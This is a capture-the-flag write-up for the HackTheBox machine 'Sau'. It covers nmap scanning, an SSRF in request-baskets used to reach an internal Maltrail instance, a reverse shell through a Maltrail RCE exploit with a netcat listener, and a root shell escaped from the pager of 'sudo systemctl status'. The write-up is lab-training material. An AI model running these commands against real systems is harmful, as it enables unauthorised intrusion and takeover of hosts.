INDEX

Enumeration
Privesc puma

Sau box HTB

Enumeration

nmap -A -p- -T4 10.10.11.224

  PORT      STATE    SERVICE VERSION
  22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  |   3072 aa8867d7133d083a8ace9dc4ddf3e1ed (RSA)
  |   256 ec2eb105872a0c7db149876495dc8a21 (ECDSA)
  |_  256 b30c47fba2f212ccce0b58820e504336 (ED25519)
  80/tcp    filtered http
  8338/tcp  filtered unknown
  55555/tcp open     unknown
  | fingerprint-strings: 
  |   FourOhFourRequest: 
  |     HTTP/1.0 400 Bad Request
  |     Content-Type: text/plain; charset=utf-8
  |     X-Content-Type-Options: nosniff
  |     Date: Sun, 30 Jul 2023 20:04:04 GMT
  |     Content-Length: 75
  |     invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
  |   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
  |     HTTP/1.1 400 Bad Request
  |     Content-Type: text/plain; charset=utf-8
  |     Connection: close
  |     Request
  |   GetRequest: 
  |     HTTP/1.0 302 Found
  |     Content-Type: text/html; charset=utf-8
  |     Location: /web
  |     Date: Sun, 30 Jul 2023 20:03:38 GMT
  |     Content-Length: 27
  |     href="/web">Found</a>.
  |   HTTPOptions: 
  |     HTTP/1.0 200 OK
  |     Allow: GET, OPTIONS
  |     Date: Sun, 30 Jul 2023 20:03:38 GMT
  |_    Content-Length: 0
  1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  SF-Port55555-TCP:V=7.93%I=7%D=7/30%Time=64C6C21A%P=x86_64-pc-linux-gnu%r(G
  SF:etRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/html;\
  SF:x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Sun,\x2030\x20Jul\x20
  SF:2023\x2020:03:38\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\"/w
  SF:eb\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Re
  SF:quest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x
  SF:20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x202
  SF:00\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Sun,\x2030\x20Jul\x20
  SF:2023\x2020:03:38\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest
  SF:,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;
  SF:\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request"
  SF:)%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
  SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
  SF:Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon
  SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\
  SF:r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400\
  SF:x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nC
  SF:onnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,67,"
  SF:HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20c
  SF:harset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(K
  SF:erberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text
  SF:/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20R
  SF:equest")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\n
  SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Options
  SF::\x20nosniff\r\nDate:\x20Sun,\x2030\x20Jul\x202023\x2020:04:04\x20GMT\r
  SF:\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20nam
  SF:e\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}\$\
  SF:n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
  SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
  SF:Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request
  SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clo
  SF:se\r\n\r\n400\x20Bad\x20Request");
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

by opening the site http://10.10.11.224:55555/web I see that it hosts request-baskets at version 1.2.1 which is vulnerable to CVE-2023-27163. The exploit for this SSRF is https://github.com/entr0pie/CVE-2023-27163

I use the exploit to access local resources listed by nmap through the proxy offered by request-baskets:
- ./CVE-2023-27163.sh "http://10.10.11.224:55555" "http://127.0.0.1:8338"
- ./CVE-2023-27163.sh "http://10.10.11.224:55555" "http://127.0.0.1:80"
NOTE: for the exploit to actually work you need to visit/query the URL that request-baskets returns (ex: http://10.10.11.224:55555/sflzwb)
by opening the URL from the browser in both cases Maltrail version 0.53 is hosted, in the first case it seems not to work due to the broken CSS while in the second case you see the login screen. This specific version is vulnerable to CVE-2023-27163. The exploit for this Unauthenticated RCE is: https://github.com/spookier/Maltrail-v0.53-Exploit
- I listen with netcat on port 4444: nc -lnvp 4444
- python3 exploit.py $(ifconfig tun0 | grep inet | head -n 1 | awk '{ print $2 }') 4444 http://10.10.11.224:55555/sflzwb/login
bingo! I got reverse shell as user

Privesc puma

I get a better shell with:

  python -c ‘import pty; pty.spawn(“/bin/bash”)’

sudo -l
```
  Matching Defaults entries for puma on sau:
      env_reset, mail_badpass,
      secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

  User puma may run the following commands on sau:
      (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
```
I can become root very simply via: https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/#spawn-shell-in-the-pager

another reference: https://gtfobins.github.io/gtfobins/systemctl/
```
  !sh
```
so if I can run systemctl status foo as root I can spawn another shell in it as root!

NOTE: It’s exactly the same for vim: https://gtfobins.github.io/gtfobins/vim/